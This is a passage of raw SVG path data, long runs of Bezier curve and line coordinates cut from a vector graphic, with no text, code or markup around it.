150.13522,62.860553 147.17295,61.986316 145.51481,61.969591 C 142.98007,61.944025 142.7791,61.776629 144.25276,60.918355 C 145.57396,60.148876 147.20304,60.499006 150.86913,62.340373 C 154.03863,63.932323 156.21468,64.477986 157.11636,63.906923 C 157.87736,63.424959 159.52662,63.023735 160.78138,63.015313 C 162.03615,63.006891 163.29492,62.395024 163.57866,61.655609 C 163.8624,60.916194 167.47728,59.46886 171.61172,58.439312 C 178.31287,56.770607 178.93192,56.422309 177.31444,55.230751 C 176.16625,54.384908 173.78164,54.053012 170.8203,54.326881 C 168.24647,54.564914 164.34356,54.28001 162.14718,53.693763 C 159.33862,52.944116 156.78885,52.940197 153.55347,53.680556 C 151.02331,54.259539 148.73941,54.387374 148.47814,53.964633 C 147.69512,52.69767 159.15209,51.846775 164.11784,52.803092 C 166.65765,53.292216 170.08562,53.494278 171.73556,53.25212 C 173.38549,53.009961 176.12262,53.529169 177.81806,54.405915 C 179.5135,55.282662 181.76793,56 182.8279,56 C 183.88786,56 185.27676,56.628544 185.91432,57.396765 C 186.55189,58.164986 187.94312,58.56613 189.00594,58.288195 C 190.06877,58.01026 192.30222,58.258307 193.96918,58.83941 C 196.10371,59.583513 197,59.582042 197,58.834437 C 197,58.143028 198.56899,58.008197 201.5,58.447729 C 204.43044,58.887176 206,58.752384 206,58.061273 C 206,57.477573 206.87344,57 207.94098,57 C 209.00852,57 210.16008,56.55 210.5,56 C 211.18823,54.886427 218.28703,54.620367 219.33552,55.668848 C 219.70338,56.036715 219.21588,57.215248 218.25218,58.287811 C 216.57325,60.156399 216.59406,60.300758 218.75,61.740934 C 219.9875,62.56759 221,63.864057 221,64.621972 C 221,65.379887 221.3375,66.03344 221.75,66.07431 C 223.21972,66.219931 227.53606,66.996109 229.75,67.512898 C 232.22966,68.091713 232.84917,70 230.55742,70 C 229.65311,70 229.25855,70.746271 229.5,72 C 229.77509,73.428447 229.34689,74 228.0016,74 C 226.96564,74 225.83992,73.55 225.5,73 C 225.16008,72.45 224.34602,72.006891 223.69098,72.015313 C 222.95065,72.024831 223.04791,72.377259 223.94803,72.946717 C 224.90548,73.552446 223.8891,73.721317 220.94803,73.445169 L 216.5,73.027529 L 222,74.838446 C 225.025,75.83445 228.4,76.560687 229.5,76.452305 C 230.6,76.343923 233.13502,76.197816 235.13337,76.127623 C 237.8146,76.033444 238.89867,75.4955 239.27018,74.074818 C 239.62336,72.724265 239.35969,72.308479 238.38682,72.681807 C 237.62407,72.974501 237,72.787859 237,72.267048 C 237,70.507073 244.54891,68.639979 246.62594,69.886237 C 248.29046,70.884977 248.20997,70.964771 245.90608,70.599876 C 242.84136,70.11448 239.60117,71.58734 242.02803,72.362682 C 247.04094,73.964228 248.66031,73.925998 248.53382,72.209095 C 248.46315,71.249754 248.07629,69.932463 247.67415,69.281783 C 247.27201,68.631102 247.15653,66.921092 247.41753,65.48176 C 247.86805,62.997264 247.73029,62.901115 244.69604,63.582326 C 239.6411,64.717194 237,64.88524 237,64.072003 C 237,63.398306 233.8694,62.241228 227.23548,60.46301 C 222.67672,59.241038 229.00884,55.310436 236.96301,54.424736 C 243.36991,53.711327 246.34058,54.589632 245.7076,57.010153 C 245.39578,58.202524 245.8816,58.997282 247.1203,59.321208 C 248.35811,59.644903 248.79781,60.363331 248.39714,61.407459 C 247.71802,63.177203 248.75125,63.443163 250.9357,62.060903 C 251.93988,61.42548 252.07146,60.753825 251.37347,59.826215 C 250.82461,59.096797 250.40354,57.6 250.43777,56.5 C 250.49343,54.711273 251.29103,54.468455 257.98822,54.201382 C 262.10675,54.037142 266.57717,54.179029 267.92251,54.516687 C 270.26767,55.105285 270.19774,55.227638 266.22725,57.482921 C 263.67191,58.934382 261.24366,59.614975 259.88659,59.260093 C 258.37365,58.864449 257.91052,59.046207 258.40265,59.842476 C 259.25585,61.222988 258.06919,61.329472 256.05215,60.053395 C 254.91357,59.333072 255.16844,58.995829 257.24532,58.474565 C 258.69787,58.109997 260.33485,58.088916 260.88305,58.427719 C 261.43124,58.766521 263.36932,58.135568 265.18988,57.0256 L 268.5,55.007476 L 262,55.103418 C 254.8236,55.209344 251.45295,55.978668 251.49982,57.5 C 251.55555,59.309021 253.09056,61 254.677,61 C 255.53443,61 257.77354,62.35 259.65278,64 C 261.53203,65.65 263.55208,67 264.14179,67 C 264.73149,67 264.95496,67.675 264.63837,68.5 C 264.20334,69.633667 264.84883,70.019281 267.28138,70.078947 C 269.05162,70.122368 269.96278,70.376442 269.30618,70.643555 C 268.64957,70.910668 268.36767,71.794569 268.67973,72.607779 C 269.16652,73.876325 269.51422,73.844611 271.12762,72.384508 C 272.66499,70.993205 273.46356,70.890181 275.50406,71.819897 C 278.12384,73.013549 278.88567,74.977466 276.75,75.031803 C 276.04588,75.049718 276.34771,75.70478 277.44113,76.531803 C 280.01808,78.48091 281.15241,78.385567 280.79384,76.25 C 280.6245,75.241474 281.13555,74.484324 282,74.463001 C 282.825,74.442652 284.28472,73.976317 285.24383,73.426701 C 286.83693,72.513777 286.85364,72.236053 285.43713,70.2137 C 284.36594,68.684371 282.85984,68 280.56542,68 C 276.31219,68 270.42477,65.549309 269.61623,63.442307 C 269.20612,62.373554 270.15209,60.647907 272.35653,58.443468 L 275.72316,55.076835 L 288.36158,55.176082 C 296.90188,55.243147 301.00497,55.636014 301.01531,56.387665 C 301.02518,57.104653 301.30908,57.061617 301.81408,56.266582 C 302.33879,55.440514 304.72813,55.134794 309.04877,55.34089 C 314.43572,55.59785 316.68033,56.320214 322.65472,59.719584 C 327.60641,62.537045 330.12957,63.470432 330.84909,62.750911 C 331.95475,61.645246 338.32919,63.644873 337.59177,64.866056 C 337.38123,65.214725 339.26104,65.596593 341.76913,65.71465 C 347.34102,65.976923 349.36129,67.530429 345.91952,68.90613 C 344.54824,69.454238 344.17153,69.900689 345.05,69.936614 C 345.9025,69.971476 347.10079,69.49921 347.71287,68.887132 C 348.32494,68.275055 349.39758,68.127681 350.09649,68.559635 C 351.0377,69.141336 350.8658,69.541372 349.43362,70.102217 C 347.72731,70.770414 347.79389,70.875955 350,71 C 352.28892,71.128702 352.33113,71.20977 350.5,71.960152 C 348.64168,72.721676 348.69942,72.858374 351.3151,73.889867 C 352.8634,74.50044 355.3958,75 356.94265,75 C 358.48951,75 360.31531,75.675 361,76.5 C 361.68469,77.325 362.75229,78.00251 363.37244,78.005577 C 363.9926,78.008644 366.25685,78.498944 368.40411,79.095132 L 372.30821,80.17911 L 369.40411,82.553592 C 367.80685,83.859557 365.9375,84.944257 365.25,84.964037 C 364.5625,84.983817 364,85.45 364,86 C 364,87.869922 359.47731,87.008863 355.65436,84.411103 C 353.55892,82.98721 351.59886,82.067802 351.29869,82.367975 C 350.21457,83.452097 351.98021,86 353.81561,86 C 356.71496,86 359.65776,89.149432 360.19206,92.824188 C 360.62808,95.82298 360.47103,96.08577 358.5877,95.508811 C 352.65765,93.692145 352.44855,93.672917 353.75,95.063956 C 355.64667,97.091186 355.25233,98.088125 352.75,97.592072 C 351.5125,97.346754 347.575,96.60142 344,95.935774 C 340.425,95.270128 335.36159,93.440869 332.74798,91.870754 C 328.08131,89.067273 323.42284,88.323111 316.75267,89.315599 C 315.24164,89.540433 313.21664,89.139224 312.25267,88.424023 C 310.59678,87.195461 310.61043,87.041671 312.5,85.638846 C 313.82761,84.653223 316.17895,84.269337 319.49396,84.496996 C 322.24063,84.685626 325.0722,84.35504 325.78634,83.762361 C 326.71945,82.987948 327.41046,83.010462 328.24238,83.842382 C 329.11921,84.719206 328.86636,85 327.2,85 C 325.99,85 325,85.45 325,86 C 325,86.55 326.125,87 327.5,87 C 328.875,87 330,87.397516 330,87.883369 C 330,88.651783 332.80025,89.955673 335.33061,90.365478 C 335.78745,90.439465 336.77001,91.332562 337.51408,92.350138 C 338.25815,93.367714 339.29907,93.933201 339.82723,93.606777 C 340.3554,93.280353 342.39588,93.685291 344.36165,94.506639 C 348.78691,96.355631 351.66667,96.42024 351.66667,94.670532 C 351.66667,93.856936 350.84744,93.49767 349.5554,93.744658 C 348.27848,93.988757 346.68196,93.306052 345.51548,92.017107 L 343.58682,89.885962 L 346.54341,90.526696 C 348.16953,90.8791 350.175,91.292278 351,91.444871 C 351.825,91.597463 353.30691,92.065384 354.29313,92.484694 C 355.27935,92.904005 356.32831,93.005026 356.62415,92.709185 C 357.66422,91.669114 354.90849,88 353.08726,88 C 352.07396,88 350.68469,87.325 350,86.5 C 349.31531,85.675 348.13521,85 347.37756,85 C 345.81918,85 345.5998,83.180298 346.90895,81.113089 C 347.52245,80.144327 348.64845,79.9477 350.64363,80.460917 C 352.21463,80.865023 355.20385,81.227473 357.28632,81.266361 C 359.6835,81.311126 360.60072,81.642119 359.78632,82.168533 C 358.76035,82.831711 358.79681,83.190822 359.96646,83.942798 C 360.87587,84.527462 361.86048,84.530758 362.55847,83.951474 C 363.17752,83.437707 363.98011,83.313448 364.34201,83.675343 C 364.7039,84.037238 365,83.331776 365,82.10765 C 365,80.816235 364.56184,80.152761 363.9562,80.527073 C 363.3821,80.881882 362.18794,80.570939 361.3025,79.83609 C 360.41706,79.10124 359.42427,78.5 359.09631,78.5 C 358.76834,78.5 358.57549,78.273527 358.66776,77.996727 C 358.76002,77.719927 357.63502,77.475 356.16776,77.452445 C 353.1939,77.406731 341.73377,72.932892 342.53588,72.13079 C 342.81712,71.849548 341.7991,71.023281 340.27361,70.29464 C 338.74813,69.566 338.31087,69.196471 339.30194,69.473465 C 340.293,69.750459 340.84999,69.566303 340.53969,69.064228 C 340.2294,68.562153 340.76852,67.965572 341.73776,67.738494 C 342.70699,67.511416 341.8125,67.341544 339.75,67.361 C 337.6875,67.380457 336,67.768748 336,68.223868 C 336,68.678989 334.5375,68.271166 332.75,67.317596 C 330.9625,66.364025 329.275,65.558078 329,65.526603 C 328.725,65.495127 327.86797,65.069236 327.09549,64.580179 C 326.16868,63.993412 325.91586,64.054841 326.35216,64.760792 C 326.98103,65.77833 325.54657,65.481896 319.8192,63.410745 C 317.64714,62.625278 318.62991,59.955638 320.83276,60.657475 C 321.99872,61.028954 322.12819,60.919542 321.26336,60.293573 C 320.58321,59.801273 318.33321,59.598458 316.26336,59.842874 C 313.41808,60.178856 312.97007,60.453521 314.42689,60.968767 C 317.5018,62.056302 314.32924,62.763087 307.79252,62.446776 C 301.13009,62.124381 298.90979,61.189616 301.44136,59.77288 C 303.02406,58.887156 303.01579,58.728712 301.31977,57.443066 C 298.75794,55.501098 293,55.562222 293,57.531385 C 293,58.373646 292.35341,59.310888 291.56314,59.614144 C 290.77287,59.917399 290.3102,60.690776 290.53499,61.332759 C 291.15689,63.108907 288.62829,65.865317 286.55462,65.671722 C 285.54297,65.577275 284.52601,66.034944 284.29471,66.688764 C 283.98605,67.561235 286.73742,67.865711 294.63556,67.833118 C 300.55433,67.808693 306.24646,67.474456 307.28474,67.09037 C 309.2713,66.355493 319,68.885053 319,70.136456 C 319,71.426526 314.61345,72.340348 314.21135,71.134046 C 313.95137,70.354106 313.16965,70.468194 311.69461,71.50135 C 310.51782,72.325607 308.86762,72.964474 308.02749,72.921053 C 306.99944,72.867918 306.90871,72.677189 307.75,72.337719 C 309.75503,71.528673 309.18851,69.805393 307.13208,70.458079 C 306.10473,70.784149 304.15466,70.629102 302.79861,70.113531 C 301.44255,69.597959 299.77008,69.524067 299.08199,69.949326 C 298.19634,70.496691 298.43978,70.881741 299.91547,71.267643 C 301.06196,71.567458 302,72.30489 302,72.90638 C 302,74.464777 299.94268,74.258104 298.00566,72.505119 C 297.09715,71.682934 294.13672,70.751378 291.42692,70.434994 C 287.06963,69.926258 286.70053,70.02381 288.23446,71.278752 C 290.06118,72.773237 289.62274,74 287.2619,74 C 285.64019,74 283,76.388276 283,77.855247 C 283,79.857164 279.43592,79.500506 277,77.254827 C 275.00266,75.413475 274.7779,74.776007 275.88213,74.084359 C 276.95861,73.410093 276.77309,73.062758 275.04324,72.513724 C 273.40169,71.992716 272.43709,72.358647 271.34608,73.916291 L 269.86994,76.023781 L 266.85804,73.011891 C 265.2015,71.355351 262.89077,70 261.72308,70 C 260.06227,70 259.86341,69.73659 260.80977,68.790231 C 262.70507,66.894932 257.3047,62.667834 254.01179,63.469164 C 252.6303,63.805347 250.9375,64.137315 250.25,64.20687 C 248.62201,64.371575 248.62201,65.978746 250.25,66.070285 C 250.9375,66.108942 250.6,66.509382 249.5,66.960152 C 247.63785,67.723242 247.69194,67.855455 250.28469,68.878304 C 251.81627,69.482518 253.39127,69.928789 253.78469,69.870016 C 256.98228,69.392338 258.86146,70.189086 258.72763,71.965758 C 258.56827,74.081316 253.96774,76.547654 251.80082,75.679219 C 251.08537,75.392491 251.49838,75.122368 252.71862,75.078947 C 254.40169,75.019057 254.77892,74.577577 254.28138,73.25 C 253.68714,71.664381 253.79911,71.640898 255.47342,73 C 257.21053,74.410076 257.24105,74.371096 255.98242,72.349779 C 254.83692,70.510141 251.40454,70.042777 252.34712,71.854785 C 253.06604,73.236843 249.1621,75.686808 246.66513,75.420588 C 245.2167,75.266161 243.77614,75.553199 243.46388,76.058451 C 243.15161,76.563703 243.5945,76.709101 244.44806,76.381557 C 245.30163,76.054013 246.00012,76.171667 246.00027,76.643011 C 246.00063,77.792282 227.58928,77.463942 222.29405,76.220245 C 217.97549,75.205941 210.30938,75.357286 209.18767,76.478993 C 208.84131,76.825357 209.21989,77.568537 210.02896,78.130504 C 211.14806,78.907812 211.19945,79.274104 210.24377,79.661541 C 209.55284,79.941645 209.26965,80.627281 209.61445,81.185178 C 210.3617,82.394262 206.55222,80.449671 202.88891,77.752057 C 200.82597,76.232935 199.56638,76.004651 196.88891,76.664641 C 195.02501,77.124089 190.4954,77.275 186.82311,77 C 180.55153,76.530352 180.22837,76.388263 181.49967,74.659304 C 182.90079,72.753777 187,73.113119 187,75.141469 C 187,75.750213 189.86595,76.037589 194.25,75.868443 C 198.2375,75.714597 202.62147,75.97117 203.99216,76.438607 C 206.2949,77.223895 206.37257,77.153845 205.0141,75.516984 C 203.76174,74.007983 202.40242,73.823714 195.84083,74.273456 C 189.79638,74.687752 188.02205,74.499836 187.60028,73.400717 C 186.99404,71.820883 183.71704,71.555798 181.18426,72.881707 C 179.67562,73.671475 176.14614,73.262793 159.27489,70.344802 C 157.50107,70.03801 154.5808,70.299087 152.78538,70.924973 C 150.67617,71.660246 149.40357,71.710696 149.18918,71.067535 C 148.9789,70.436689 148.18693,70.490825 147.02678,71.215347 C 145.58276,72.117157 144.63394,71.990169 142.53363,70.61399 C 140.58673,69.338333 139.01483,69.072558 136.68553,69.625204 C 134.93349,70.04089 133.275,70.35408 133,70.321181 C 132.725,70.288281 130.925,69.978186 129,69.632079 C 126.8612,69.247532 126.02766,69.342551 126.85676,69.876397 C 127.69161,70.413942 127.82808,70.988216 127.21155,71.369256 C 126.66046,71.709847 125.94409,71.296692 125.61962,70.451132 C 125.14141,69.204936 124.62195,69.13196 122.87698,70.065841 C 119.84275,71.689708 115,72.320237 115,71.091428 C 115,70.525666 114.325,70.321791 113.5,70.638374 C 112.675,70.954956 112,71.774776 112,72.460196 C 112,73.858115 102.79393,73.413608 99.815741,71.87189 C 98.889399,71.392351 96.751899,71 95.065741,71 L 92,71 L 92,87 L 92,103 L 94.928571,103 C 96.539286,103 98.451786,103.59247 99.178571,104.3166 C 101.73155,106.86024 106.10676,109.3302 105.79905,108.05409 C 105.32778,106.09966 108.42442,104.63872 111.43614,105.39462 C 113.23802,105.84686 113.99622,106.56746 113.64185,107.49094 C 113.31963,108.33063 113.59469,108.70903 114.32387,108.42921 C 114.99598,108.1713 117.51146,109.79315 119.91382,112.03332 C 122.31619,114.27349 125.46158,116.34232 126.90358,116.63072 C 129.95299,117.2406 132.35141,121.24859 130.67196,122.92804 C 129.90935,123.69065 130.01844,124.00442 131.05,124.01531 C 132.28319,124.02834 132.27571,124.17557 131,125 C 129.70731,125.8354 129.73371,125.97149 131.19098,125.98469 C 132.12102,125.99311 133.17359,125.52815 133.53001,124.95144 C 134.35369,123.6187 137,125.65568 137,127.62244 C 137,128.87449 138.24444,129.44103 140.27079,129.11149 C 140.69473,129.04255 140.76909,130.07183 140.43605,131.39879 C 139.95453,133.31731 140.30868,133.97372 142.16526,134.60384 C 143.44937,135.03967 144.8375,135.30709 145.25,135.19813 C 145.6625,135.08916 146,135.5051 146,136.12244 C 146,136.85387 146.58942,136.76677 147.69196,135.87244 C 148.84162,134.93989 149.14322,134.90064 148.63294,135.75 C 148.2199,136.4375 148.28853,137 148.78544,137 C 149.28236,137 150.99641,138.13451 152.59446,139.52114 L 155.5,142.04228 L 204.73939,141.77114 C 240.84201,141.57234 254.09516,141.80358 254.41498,142.63787 C 254.65489,143.2637 256.57216,144.02361 258.67559,144.32658 C 260.77901,144.62954 264.42396,145.15364 266.77547,145.49126 C 270.16916,145.9785 271.57823,145.69032 273.60765,144.09398 C 276.40988,141.88975 281.18261,142.13738 284.07874,144.63726 C 284.94705,145.38677 286.3614,146 287.22175,146 C 288.54666,146 290.19506,148.28937 290.10185,150 C 290.05239,150.90774 293.44357,151.85824 297,151.93345 C 301.04301,152.01896 307.34565,155.48379 306.72539,157.27992 C 306.49311,157.95254 304.88972,158.41527 303.15203,158.31117 C 300.56638,158.15627 300,158.49584 300,160.20093 C 300,161.34415 299.2125,162.87245 298.25,163.59714 C 296.75763,164.7208 297.29593,164.8242 301.90656,164.29955 C 305.84426,163.85148 307.12064,163.99578 306.60463,164.83071 C 306.14237,165.57865 306.44574,165.76618 307.47745,165.37028 C 308.9105,164.82037 308.9069,164.65241 307.43909,163.57912 C 305.97485,162.50844 305.96905,162.27058 307.37859,161.10076 C 308.23615,160.38905 310.53127,159.65864 312.47886,159.47763 C 314.42645,159.29662 317.47795,158.70154 319.25997,158.15522 C 321.04199,157.6089 324.75,156.88344 327.5,156.54308 C 336.82204,155.38933 337.8137,154.98093 339.90665,151.43364 C 342.1878,147.56738 341.98339,147.30955 338.46482,149.61501 C 337.10917,150.50327 336,150.92305 336,150.54786 C 336,149.30855 343.44434,142.75504 346.5,141.30435 C 348.15,140.521 350.625,139.21368 352,138.3992 C 353.92496,137.25895 356.69015,137.03562 364.0217,137.42829 C 372.66777,137.89137 374.00121,137.71407 378.5217,135.5004 C 381.25977,134.15958 384.48594,133.04847 385.69098,133.03127 C 388.22953,132.99504 389.54844,131.45699 387.90955,130.4441 C 387.11351,129.95212 387.18156,129.4952 388.14324,128.875 C 389.27874,128.1427 389.27017,127.85201 388.09068,127.09252 C 387.31556,126.59341 386.00424,126.44488 385.17664,126.76246 C 384.19683,127.13845 383.92415,126.93174 384.39497,126.16994 C 385.40315,124.53867 382.68492,124.68698 378.34576,126.5 C 376.37125,127.325 374.02321,127.96447 373.12788,127.92105 C 371.77989,127.85568 371.75483,127.74208 372.98214,127.26034 C 373.79732,126.94037 375.06696,126.07589 375.80357,125.33929 C 376.54018,124.60268 378.34821,123.9478 379.82143,123.884 C 381.5147,123.81067 381.85627,123.59977 380.75,123.31067 C 379.7875,123.05915 379,122.42051 379,121.89149 C 379,121.29922 378.32757,121.27548 377.25,121.82969 C 375.05533,122.95845 373,122.2751 373,120.41667 C 373,119.6375 372.16974,119 371.15499,119 C 370.14023,119 368.49549,118.1 367.5,117 C 365.73808,115.05311 365.75388,114.9982 368.09501,114.93232 L 370.5,114.86464 L 368.25,113.77951 C 367.0125,113.18268 366,112.26499 366,111.7402 C 366,111.2154 365.30163,111.05401 364.44806,111.38156 C 363.55814,111.72305 363.15674,111.55541 363.50708,110.98855 C 363.8431,110.44485 363.61492,110 363,110 C 362.38508,110 362.16008,109.55 362.5,109 C 362.83992,108.45 362.64148,108 362.05902,108 C 361.47656,108 361,107.325 361,106.5 C 361,105.65234 360.10455,105 358.94098,105 C 357.80852,105 357.12291,105.38986 357.4174,105.86635 C 357.71189,106.34285 357.06345,107.53759 355.97642,108.52134 C 354.4573,109.89612 353.99646,109.98489 353.98469,108.90499 C 353.97395,107.9202 353.74896,107.84639 353.2324,108.65822 C 352.82706,109.29524 350.80346,110.13385 348.73551,110.5218 C 345.46803,111.13478 345.06024,111.0066 345.62183,109.54312 C 346.1844,108.07707 345.7653,107.94863 342.38403,108.55083 C 339.18565,109.12047 338.72066,109.00933 339.75,107.92129 C 341.69087,105.86973 341.22839,104.01012 338.75,103.90032 C 336.59959,103.80505 336.61066,103.767 339,103.04064 L 341.5,102.28065 L 338.6849,101.14032 C 337.1366,100.51315 335.40606,100 334.83927,100 C 334.27248,100 332.5731,99.120144 331.06286,98.044763 C 329.07866,96.631886 327.01066,96.16648 323.60761,96.366948 C 321.01746,96.519529 318.66958,96.274385 318.3901,95.822184 C 317.70669,94.716403 313.25884,94.772165 312.56476,95.895215 C 312.26046,96.387584 312.64817,97.034749 313.42634,97.33336 C 314.20451,97.631971 314.70971,98.691624 314.54902,99.688144 C 314.38833,100.68467 314.65136,101.99888 315.13355,102.60863 C 315.67601,103.29461 315.21814,104.72426 313.93254,106.35863 C 312.7898,107.81138 312.31997,109 312.88846,109 C 314.71758,109 318,113.30456 318,115.70326 C 318,118.17926 313.0051,121.98931 309.75,121.99626 C 308.7875,121.99832 308,122.45 308,123 C 308,123.55 308.40077,124 308.89059,124 C 309.90976,124 310.88565,130.65936 310.23599,133.1808 C 309.99068,134.13292 309.19534,134.62846 308.40146,134.32381 C 307.63066,134.02803 307,134.27004 307,134.86163 C 307,136.2378 303.75881,135.07978 302.70031,133.32541 C 302.26048,132.59644 301.32402,132 300.61929,132 C 298.83813,132 296.66667,127.60739 296.66667,124.00432 C 296.66667,121.10443 296.50736,120.99947 292.08333,120.98482 C 286.68019,120.96692 280.6053,119.23453 276.70489,116.59932 C 274.66793,115.22309 272.04212,114.69377 267.02419,114.64782 C 263.23711,114.61314 260.35322,114.2375 260.61554,113.81305 C 261.47743,112.41849 258.91056,108.89118 257.1869,109.10152 C 251.04758,109.85071 251.21298,103.99302 257.51965,97.316674 C 260.7745,93.87104 262.26825,92.950365 263.80991,93.439669 C 264.92189,93.792596 266.10109,93.645448 266.43036,93.112674 C 267.0026,92.186771 264.14233,90.76339 262.35356,91.083902 C 259.7665,91.547451 256,90.852789 256,89.912102 C 256,88.877066 259.20543,89.087949 267.37511,90.660461 C 269.33248,91.037219 270.03184,90.860532 269.56609,90.106933 C 269.11276,89.373426 270.16695,88.989271 272.69098,88.968197 C 274.78594,88.950705 277.37351,88.275705 278.44113,87.468197 C 280.29011,86.069697 280.24264,85.999285 277.44113,85.984944 C 275.82351,85.976663 272.75915,85.363836 270.63145,84.623106 C 266.77001,83.278804 266.76791,83.275067 269.48734,82.592534 C 271.26583,82.146161 273.03082,82.445399 274.57071,83.454371 C 277.26932,85.222571 280.58796,85.475708 281.51008,83.983688 C 281.85554,83.424717 282.6696,83.277069 283.3191,83.655582 C 283.96859,84.034096 283.68424,83.412281 282.68721,82.273772 C 280.91946,80.25518 280.93188,80.201714 283.18721,80.121573 C 284.45924,80.076373 286.85,79.872162 288.5,79.667772 C 290.15,79.463382 291.74494,79.668804 292.0443,80.124266 C 292.60353,80.975085 300,79.337892 300,78.363289 C 300,78.064802 298.9875,76.999689 297.75,75.996372 C 296.5125,74.993055 295.83303,73.837892 296.24007,73.429343 C 297.20334,72.462499 301.72241,77.332766 301.23072,78.807837 C 301.02377,79.428701 299.30722,80.226941 297.41617,80.581704 C 294.12572,81.198997 291.61728,83 294.04797,83 C 294.68927,83 294.95672,83.670413 294.64229,84.489807 C 294.25887,85.488973 294.8823,86.183339 296.5353,86.598215 C 297.89088,86.938445 299,87.618032 299,88.108408 C 299,88.598784 300.09844,89 301.44098,89 C 304.00847,89 306.06159,90.87926 303.80902,91.167506 C 299.92659,91.664313 296.41859,91.386435 295.80728,90.533665 C 295.39363,89.956631 293.41818,90.520749 290.90375,91.93394 C 287.10182,94.070744 286.57916,94.144955 285.52126,92.698186 C 284.78322,91.68886 283.54469,91.306306 282.17479,91.664542 C 280.81677,92.019672 280,91.773715 280,91.009643 C 280,90.336651 280.5625,90.000864 281.25,90.263449 C 282.05426,90.570631 282.53687,89.739035 282.6034,87.931365 L 282.7068,85.121855 L 279.51147,87.559046 C 277.75405,88.899501 275.12005,90.09523 273.65815,90.216221 C 272.19624,90.337211 269.84018,91.432931 268.42245,92.651153 C 267.00471,93.869375 263.85637,95.683729 261.42612,96.683051 C 258.99588,97.682373 257.00581,98.869643 257.00375,99.321429 C 257.00169,99.773214 256.30105,100.8418 255.44678,101.69607 C 253.06392,104.07894 254.00264,107.44243 257.15229,107.80699 C 258.92787,108.01251 260.1743,109.00415 260.9231,110.80699 C 261.94917,113.27742 262.54104,113.51458 268.0841,113.67646 C 272.02983,113.79169 275.05887,114.48357 276.81329,115.67034 C 280.77358,118.34928 286.79522,119.96765 292.86663,119.98482 C 297.82004,119.99883 298.19105,120.16143 297.68503,122.09645 C 296.92932,124.98628 297.87365,127 299.98454,127 C 300.95836,127 302.37271,127.74964 303.12756,128.66587 C 304.36482,130.16767 304.22914,130.26429 301.75,129.64682 C 298.24185,128.77307 298.29371,129.1017 302.10909,131.92254 C 304.80669,133.91695 305.52895,134.05487 307.56614,132.9646 C 309.44832,131.95729 309.71727,131.34022 308.92187,129.85401 C 308.37614,128.8343 308.18202,128 308.4905,128 C 308.79897,128 308.3585,126.66016 307.51167,125.02257 C 305.99856,122.09653 306.01969,122.03369 308.73599,121.38223 C 314.11672,120.09174 317,118.05581 317,115.5469 C 317,113.33485 313.71234,109.76852 310.69982,108.7127 C 309.85878,108.41794 310.0233,107.70167 311.25,106.31736 C 313.23945,104.0723 313.54067,102 311.87756,102 C 311.10205,102 311.1399,101.53636 312,100.5 C 312.99593,99.299981 312.98328,98.684777 311.93675,97.423785 C 309.94746,95.02684 312.58533,93.806404 318,94.618561 C 320.475,94.989791 323.4,95.224546 324.5,95.14024 C 327.5691,94.905017 334.82465,97.083786 336.10344,98.624641 C 336.73124,99.381088 338.58793,100 340.22943,100 C 342.47152,100 343.07079,100.37315 342.63837,101.5 C 341.75341,103.80617 342.96005,105.92798 346.07152,107.53699 C 350.23149,109.68819 351.52894,109.3859 355.44573,105.35291 L 358.98773,101.70583 L 363.89212,106.10291 C 366.58953,108.52131 368.84229,111.0625 368.89825,111.75 C 368.95421,112.4375 369.45,113 370,113 C 370.55,113 371,113.94213 371,115.09362 C 371,116.34624 371.8034,117.39733 373,117.71025 C 374.1,117.99791 375,118.63078 375,119.11663 C 375,119.60248 376.125,120 377.5,120 C 378.875,120 380,120.47656 380,121.05902 C 380,121.64148 380.40939,121.86502 380.90976,121.55577 C 382.30607,120.6928 385,122.04378 385,123.60699 C 385,124.37314 385.8449,125 386.87756,125 C 389.36228,125 390.63727,126.74376 391.26458,131 C 391.65376,133.64054 391.25488,135.1139 389.64022,137 C 388.4631,138.375 387.89667,139.17833 388.38148,138.78518 C 388.8663,138.39203 390.2163,138.58771 391.38148,139.22003 C 392.54667,139.85234 394.56904,140.39901 395.87565,140.43484 C 398.9927,140.52033 402.39344,146.39634 400.91964,149.15016 C 399.87287,151.10605 395,151.75704 395,149.94098 C 395,149.35852 395.51953,149.20305 396.15451,149.59549 C 396.8685,150.03676 397.03762,149.86989 396.59776,149.15818 C 396.07647,148.31472 395.10036,148.41386 392.94325,149.52935 C 390.2367,150.92896 389.56455,150.75786 389.88158,148.75 C 389.99544,148.02887 384.83249,147.59485 380.34551,147.94836 C 379.16054,148.04172 377.93746,147.70782 377.62754,147.20637 C 376.74829,145.7837 379.53075,142.59196 380.90814,143.44323 C 381.81304,144.00249 381.72031,144.48408 380.54173,145.346 C 379.30443,146.25087 380.74872,146.48828 387.23189,146.4457 C 393.80592,146.40252 395.43431,146.10301 395.1794,144.98391 C 395.00307,144.20978 395.65158,142.99672 396.62053,142.28821 C 398.7316,140.74456 398.05296,140.64917 394.51893,141.9928 C 392.55928,142.73786 391.3378,142.61221 389.62401,141.48929 C 388.36799,140.66632 387.03877,140.29456 386.67017,140.66316 C 386.30158,141.03175 386,140.59917 386,139.70185 C 386,138.80453 386.9126,137.58196 388.02801,136.98501 C 389.14341,136.38806 389.77094,135.43839 389.42251,134.87462 C 388.5541,133.46949 384,137.87088 384,140.1153 C 384,141.08696 383.52006,142.17858 382.93347,142.54112 C 380.89888,143.79857 380.90273,142.20834 382.94237,138.86278 C 384.06996,137.01325 384.99421,135.13218 384.99626,134.68261 C 385.00137,133.5657 380.91028,134.94687 379.22671,136.63043 C 377.19412,138.66302 373.54529,139.30332 368.23719,138.55886 L 363.5,137.89447 L 366.86278,140.00112 C 368.71231,141.15978 369.97079,142.36254 369.65941,142.67393 C 368.78162,143.55171 362,142.0295 362,140.95469 C 362,140.42961 361.2125,139.95514 360.25,139.90032 C 359.08333,139.83387 359.33333,139.53376 361,139 C 363.13604,138.31592 362.91767,138.19936 359.5,138.19936 C 354.35945,138.19936 350.76059,139.21822 350.22494,140.82519 C 349.90088,141.79736 350.99345,141.9371 354.88362,141.42105 C 359.16316,140.85335 360.07032,141.01968 360.62854,142.47437 C 361.02009,143.49475 360.72013,144.55493 359.89572,145.06445 C 359.12807,145.53888 358.5,146.27235 358.5,146.69437 C 358.5,147.73809 355.77897,147.7286 354.2938,146.6797 C 353.6304,146.21117 352.54837,146.16109 351.8893,146.56842 C 351.13122,147.03693 350.95312,146.88487 351.40451,146.15451 C 351.79695,145.51953 353.63992,145 355.5,145 C 359.15725,145 361.09347,143.35683 358.575,142.39041 C 356.84731,141.72743 347.6054,143.66721 344.5,145.3446 C 343.4,145.93877 342.05,146.29716 341.5,146.14102 C 340.95,145.98489 341.03927,146.40605 341.69838,147.07695 C 342.35748,147.74784 344.15347,148.34248 345.68945,148.39838 C 347.97972,148.48172 348.57487,149.03973 